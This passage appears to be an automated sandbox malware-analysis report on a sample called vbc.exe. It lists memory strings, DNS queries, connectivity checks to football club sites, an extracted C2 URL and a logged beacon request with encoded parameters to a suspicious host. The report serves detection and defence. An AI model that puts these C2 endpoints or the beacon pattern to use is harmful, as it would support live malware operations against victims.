Source:	Binary string: C:\Users\Public\vbc.exeualBasic.pdbpdbsic.pdboft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb.n source: vbc.exe, 00000004.00000002.2382793351.00000000056E5000.00000004.00000001.sdmp
Source:	Binary string: :\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbll source: vbc.exe, 00000004.00000002.2376278535.0000000000307000.00000004.00000020.sdmp
Source:	Binary string: :\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: vbc.exe, 00000004.00000002.2376141871.000000000027C000.00000004.00000020.sdmp
Source:	Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: vbc.exe, 00000004.00000003.2203497479.0000000005720000.00000004.00000001.sdmp

Software Vulnerabilities:

Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop esi	10_2_00417267
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop esi	10_2_004172C5
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4x nop then pop esi	14_2_00097267
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 4x nop then pop esi	14_2_000972C5

Source: global traffic

DNS query: name: carnesymas-restaurante.renova-sa.net

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 97.107.138.110:443

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 97.107.138.110:443

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.mathlene.com/z65/

Source: global traffic

HTTP traffic detected: GET /z65/?khm06=LNri0hTDA3J+egDGUUWsiV5v8a8SlWFxc+6+F6yDAxnyfd9Lz/4xhtJBrlTkPubTKsq9BA==&AX=mTXhwhcHBBUhiJp HTTP/1.1Host: www.ofetons.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 151.101.2.133 151.101.2.133
Source: Joe Sandbox View	IP Address: 151.101.2.133 151.101.2.133

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: unknown

HTTPS traffic detected: 99.86.159.103:443 -> 192.168.2.22:49178 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7B1E890E.emf

Jump to behavior

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: OtherHost: www.chelseafc.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /base/80715A1271D5E2B9CFA3628555538742.html HTTP/1.1User-Agent: OtherHost: 0k10dk21kkeok2e.onlineConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: OtherHost: www.liverpoolfc.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /z65/?khm06=LNri0hTDA3J+egDGUUWsiV5v8a8SlWFxc+6+F6yDAxnyfd9Lz/4xhtJBrlTkPubTKsq9BA==&AX=mTXhwhcHBBUhiJp HTTP/1.1Host: www.ofetons.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: vbc.exe, 00000004.00000002.2376799852.000000000217B000.00000004.00000001.sdmp	String found in binary or memory: <a href="https://www.facebook.com/manchesterunited " target="_blank" data-an-track="true" data-track-type="link" data-track-text="https://www.facebook.com/manchesterunited "> equals www.facebook.com (Facebook)
Source: vbc.exe, 00000004.00000002.2376799852.000000000217B000.00000004.00000001.sdmp	String found in binary or memory: <a href="https://www.youtube.com/manutd" target="_blank" data-an-track="true" data-track-type="link" data-track-text="https://www.youtube.com/manutd"> equals www.youtube.com (Youtube)
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: <a href="https://www.facebook.com/realmadrid" onclick="dataLayer.push({'eventCategory': dataLayer[0].pageHier,'eventAction': 'Clic_rrssfooter','event': 'click\|iraFacebook', 'eventLabel':'Facebook' });" class="social_facebook_btn" target="_blank" style="margin-left: 12px; vertical-align: middle;">Facebook</a> equals www.facebook.com (Facebook)
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: <a href="https://www.twitter.com/realmadrid" onclick="dataLayer.push({'eventCategory': dataLayer[0].pageHier,'eventAction': 'Clic_rrssfooter','event': 'click\|iraTwitter', 'eventLabel':'Twitter' });" class="social_twitter_btn" target="_blank" style="vertical-align: middle;">Twitter</a> equals www.twitter.com (Twitter)
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: <a href="https://www.youtube.com/realmadrid" onclick="dataLayer.push({'eventCategory': dataLayer[0].pageHier,'eventAction': 'Clic_rrssfooter','event': 'click\|iraYoutube', 'eventLabel':'Youtube' });" class="social_youtube_btn" target="_blank" style="margin-left: 12px; vertical-align: middle;">Youtube</a> equals www.youtube.com (Youtube)
Source: vbc.exe, 00000004.00000002.2376229174.00000000002CA000.00000004.00000020.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: carnesymas-restaurante.renova-sa.net

Source: vbc.exe, 00000004.00000002.2376799852.000000000217B000.00000004.00000001.sdmp	String found in binary or memory: http://0k10dk21kkeok2e.online
Source: vbc.exe	String found in binary or memory: http://0k10dk21kkeok2e.online/base/80715A1271D5E2B9CFA3628555538742.html
Source: vbc.exe, 00000004.00000000.2162389108.0000000000152000.00000020.00020000.sdmp, vbc.exe, 00000008.00000002.2201944869.0000000000152000.00000020.00020000.sdmp, vbc.exe, 00000009.00000002.2202502603.0000000000152000.00000020.00020000.sdmp, vbc.exe, 0000000A.00000000.2202973953.0000000000152000.00000020.00020000.sdmp	String found in binary or memory: http://0k10dk21kkeok2e.online/base/80715A1271D5E2B9CFA3628555538742.htmlKJHpWJXMGDGMCFiCJFToiVmpLqxO
Source: vbc.exe, 00000004.00000002.2382793351.00000000056E5000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: vbc.exe, 00000004.00000002.2376229174.00000000002CA000.00000004.00000020.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
Source: vbc.exe, 00000004.00000002.2376782463.0000000002162000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1.crt0
Source: explorer.exe, 0000000D.00000000.2213958542.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: vbc.exe, 00000004.00000002.2376229174.00000000002CA000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: vbc.exe, 00000004.00000002.2376229174.00000000002CA000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: vbc.exe, 00000004.00000002.2376229174.00000000002CA000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: vbc.exe, 00000004.00000002.2376229174.00000000002CA000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: vbc.exe, 00000004.00000002.2376229174.00000000002CA000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: vbc.exe, 00000004.00000002.2376229174.00000000002CA000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: vbc.exe, 00000004.00000002.2376229174.00000000002CA000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: vbc.exe, 00000004.00000002.2382793351.00000000056E5000.00000004.00000001.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: vbc.exe, 00000004.00000002.2382793351.00000000056E5000.00000004.00000001.sdmp	String found in binary or memory: http://crl.rootg2.amazontrust.com/rootg2.crl0
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: http://crl.sca1b.amazontrust.com/sca1b.crl0
Source: vbc.exe, 00000004.00000002.2383021653.0000000005733000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: vbc.exe, 00000004.00000002.2376782463.0000000002162000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1.crl0
Source: vbc.exe, 00000004.00000002.2376229174.00000000002CA000.00000004.00000020.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/ssca-sha2-g7.crl0/
Source: vbc.exe, 00000004.00000002.2382793351.00000000056E5000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: vbc.exe, 00000004.00000002.2383021653.0000000005733000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
Source: vbc.exe, 00000004.00000002.2376782463.0000000002162000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1.crl0L
Source: vbc.exe, 00000004.00000002.2376229174.00000000002CA000.00000004.00000020.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/ssca-sha2-g7.crl0L
Source: vbc.exe, 00000004.00000002.2382793351.00000000056E5000.00000004.00000001.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: vbc.exe, 00000004.00000002.2382793351.00000000056E5000.00000004.00000001.sdmp	String found in binary or memory: http://crt.rootg2.amazontrust.com/rootg2.cer0=
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: http://crt.sca1b.amazontrust.com/sca1b.crt0
Source: vbc.exe, 00000004.00000002.2376229174.00000000002CA000.00000004.00000020.sdmp, vbc.exe, 00000004.00000003.2167341563.0000000005735000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: vbc.exe, 00000004.00000002.2376141871.000000000027C000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enAEY
Source: vbc.exe, 00000004.00000002.2376799852.000000000217B000.00000004.00000001.sdmp	String found in binary or memory: http://instagram.com/manchesterunited
Source: vbc.exe, 00000004.00000002.2382793351.00000000056E5000.00000004.00000001.sdmp	String found in binary or memory: http://o.ss2.us/0
Source: vbc.exe, 00000004.00000002.2376229174.00000000002CA000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: vbc.exe, 00000004.00000002.2376229174.00000000002CA000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: vbc.exe, 00000004.00000002.2376229174.00000000002CA000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: vbc.exe, 00000004.00000002.2376229174.00000000002CA000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: vbc.exe, 00000004.00000002.2376229174.00000000002CA000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: vbc.exe, 00000004.00000002.2383021653.0000000005733000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.2382793351.00000000056E5000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0F
Source: vbc.exe, 00000004.00000002.2376782463.0000000002162000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0G
Source: vbc.exe, 00000004.00000002.2376229174.00000000002CA000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: vbc.exe, 00000004.00000002.2376229174.00000000002CA000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: vbc.exe, 00000004.00000002.2376229174.00000000002CA000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: vbc.exe, 00000004.00000002.2382793351.00000000056E5000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: vbc.exe, 00000004.00000002.2382793351.00000000056E5000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.rootg2.amazontrust.com08
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.sca1b.amazontrust.com06
Source: vbc.exe, 00000004.00000002.2382793351.00000000056E5000.00000004.00000001.sdmp	String found in binary or memory: http://s.ss2.us/r.crl0
Source: vbc.exe, 00000004.00000002.2382338681.00000000051F0000.00000002.00000001.sdmp, explorer.exe, 0000000D.00000002.2376706844.0000000001C70000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.2376740870.0000000002121000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: vbc.exe, 00000004.00000002.2383458544.0000000005F70000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 0000000D.00000000.2213958542.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 0000000D.00000000.2213958542.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: vbc.exe, 00000004.00000002.2382338681.00000000051F0000.00000002.00000001.sdmp, explorer.exe, 0000000D.00000002.2376706844.0000000001C70000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: http://www.carlsberg.com/
Source: vbc.exe, 00000004.00000002.2376740870.0000000002121000.00000004.00000001.sdmp	String found in binary or memory: http://www.chelseafc.com
Source: vbc.exe	String found in binary or memory: http://www.chelseafc.com/
Source: vbc.exe, 00000004.00000000.2162389108.0000000000152000.00000020.00020000.sdmp, vbc.exe, 00000008.00000002.2201944869.0000000000152000.00000020.00020000.sdmp, vbc.exe, 00000009.00000002.2202502603.0000000000152000.00000020.00020000.sdmp, vbc.exe, 0000000A.00000000.2202973953.0000000000152000.00000020.00020000.sdmp	String found in binary or memory: http://www.chelseafc.com/-http://www.manutd.com/9http://www.mancity.com/base/
Source: vbc.exe, 00000004.00000002.2376229174.00000000002CA000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: vbc.exe, 00000004.00000002.2376229174.00000000002CA000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: vbc.exe, 00000004.00000002.2376229174.00000000002CA000.00000004.00000020.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: explorer.exe, 0000000D.00000000.2213958542.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 0000000D.00000000.2213958542.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: http://www.liverpoolfc.com
Source: vbc.exe	String found in binary or memory: http://www.liverpoolfc.com/
Source: vbc.exe, 00000004.00000000.2162389108.0000000000152000.00000020.00020000.sdmp, vbc.exe, 00000008.00000002.2201944869.0000000000152000.00000020.00020000.sdmp, vbc.exe, 00000009.00000002.2202502603.0000000000152000.00000020.00020000.sdmp, vbc.exe, 0000000A.00000000.2202973953.0000000000152000.00000020.00020000.sdmp	String found in binary or memory: http://www.liverpoolfc.com/?http://www.realmadrid.com/base/#User-Agent:
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: http://www.liverpoolfc.com/accessible/accessible
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: http://www.liverpoolfc.com/contactus
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: http://www.liverpoolfc.com/corporate/anti-slavery
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: http://www.liverpoolfc.com/corporate/browser-support
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: http://www.liverpoolfc.com/corporate/rss-feeds
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: http://www.liverpoolfc.com/history/heysel
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: http://www.liverpoolfc.com/history/hillsborough
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.2376799852.000000000217B000.00000004.00000001.sdmp	String found in binary or memory: http://www.liverpoolfc.com/legal/cookies
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: http://www.liverpoolfc.com/legal/privacy-policy
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: http://www.liverpoolfc.com/legal/terms-and-conditions
Source: vbc.exe	String found in binary or memory: http://www.mancity.com/base/
Source: vbc.exe, 00000004.00000002.2376740870.0000000002121000.00000004.00000001.sdmp	String found in binary or memory: http://www.mancity.com/base/yHKMynEQdmageymJtFtbdgSAEMgxzBItmdtrEXvZktIObREdEIRhKVrOjiMghq.html
Source: vbc.exe, 00000004.00000002.2376799852.000000000217B000.00000004.00000001.sdmp	String found in binary or memory: http://www.mancity.comP
Source: vbc.exe	String found in binary or memory: http://www.manutd.com/
Source: vbc.exe, 00000004.00000002.2376771128.000000000214D000.00000004.00000001.sdmp	String found in binary or memory: http://www.manutd.comP
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: http://www.realmadrid.com
Source: vbc.exe	String found in binary or memory: http://www.realmadrid.com/base/
Source: vbc.exe, 00000004.00000002.2376740870.0000000002121000.00000004.00000001.sdmp	String found in binary or memory: http://www.realmadrid.com/base/yHKMynEQdmageymJtFtbdgSAEMgxzBItmdtrEXvZktIObREdEIRhKVrOjiMghq.html
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: http://www.realmadrid.com/en
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: http://www.realmadrid.com/fr
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: http://www.standardchartered.com/home/en/index.html?camp_id=liverpool_source=liverpoolfctv_medium=4
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: http://www.verbier.ch/en/index.htm?reset=1
Source: vbc.exe, 00000004.00000002.2382793351.00000000056E5000.00000004.00000001.sdmp	String found in binary or memory: http://x.ss2.us/x.cer0&
Source: vbc.exe, 00000004.00000002.2376799852.000000000217B000.00000004.00000001.sdmp	String found in binary or memory: https://app.adjust.com/88iacno_eo402dp?campaign=Footer&adgroup=MUOfficialApp&creative=180910
Source: vbc.exe, 00000004.00000002.2376771128.000000000214D000.00000004.00000001.sdmp	String found in binary or memory: https://assets.manutd.com/AssetPicker/images/0/0/14/154/957027/OT_LR_2_1080x5661611683583510_large.j
Source: vbc.exe, 00000004.00000002.2376782463.0000000002162000.00000004.00000001.sdmp	String found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/uploads/players/4793__1794__my_liverpool_titles_saint.jpg
Source: vbc.exe, 00000004.00000002.2376782463.0000000002162000.00000004.00000001.sdmp	String found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/uploads/players/5669__6385__plrs_main_plasma.jpg
Source: vbc.exe, 00000004.00000002.2376782463.0000000002162000.00000004.00000001.sdmp	String found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/uploads/players/7020__5774__going_up_62_web.jpg
Source: vbc.exe, 00000004.00000002.2376782463.0000000002162000.00000004.00000001.sdmp	String found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/uploads/players/8888__9977__sheff_utd_(a).jpg
Source: vbc.exe, 00000004.00000002.2376782463.0000000002162000.00000004.00000001.sdmp	String found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/JE-552/lfc/images/AjaxLoader-298x179.gif
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/JE-552/lfc/js/home-scripts.min.js
Source: vbc.exe, 00000004.00000002.2380975508.0000000003858000.00000004.00000001.sdmp	String found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/JE-552/lfc/js/scripts.min.js
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/page_banner/0002/08/7abcb0d130016504c4a4761ae
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/page_banner/0002/08/a645dcf8e1f1cf28fb38a0701
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/page_banner/0002/11/aa0024fde91a556201a3e18ac
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/page_banner/0002/11/caba13e5118c92cd18eab74b2
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/page_banner/0002/11/f9d2bf533c57965e0174bf510
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/16/thumb_15152_partnerlogo_p
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/41/thumb_40979_partnerlogo_p
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/73/thumb_72807_partnerlogo_p
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/73/thumb_72810_partnerlogo_p
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/74/thumb_73386_partnerlogo_p
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/74/thumb_73714_partnerlogo_p
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/78/thumb_77004_partnerlogo_p
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/90/thumb_89785_partnerlogo_p
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/92/thumb_91232_partnerlogo_p
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0001/92/thumb_91236_partnerlogo_p
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/02/thumb_101725_partnerlogo_
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/08/thumb_107008_partnerlogo_
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/08/thumb_107697_partnerlogo_
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/09/thumb_108617_partnerlogo_
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/09/thumb_108623_partnerlogo_
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/11/thumb_110194_partnerlogo_
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/13/thumb_112227_partnerlogo_
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/13/thumb_112272_partnerlogo_
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/17/thumb_116415_partnerlogo_
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/18/thumb_117132_partnerlogo_
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://faq.liverpoolfc.com/portal/home
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Oswald:400
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://instagram.com/realmadrid
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://iugis.com/uk/home/
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://mg.co.uk/
Source: vbc.exe, 00000004.00000002.2376799852.000000000217B000.00000004.00000001.sdmp	String found in binary or memory: https://play.google.com/store/apps/details?id=
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://plus.google.com/
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://pubads.g.doubleclick.net/gampad/ads?sz=640x480&iu=/
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://schema.org/Organization
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://sdk.privacy-center.org/loader.js
Source: vbc.exe, 00000004.00000002.2376229174.00000000002CA000.00000004.00000020.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://secure.widget.cloud.opta.net/v3/v3.opta-widgets.js
Source: vbc.exe, 00000004.00000002.2376823725.00000000021A9000.00000004.00000001.sdmp	String found in binary or memory: https://tribus-watches.com/
Source: vbc.exe, 00000004.00000002.2376799852.000000000217B000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/ManUtd
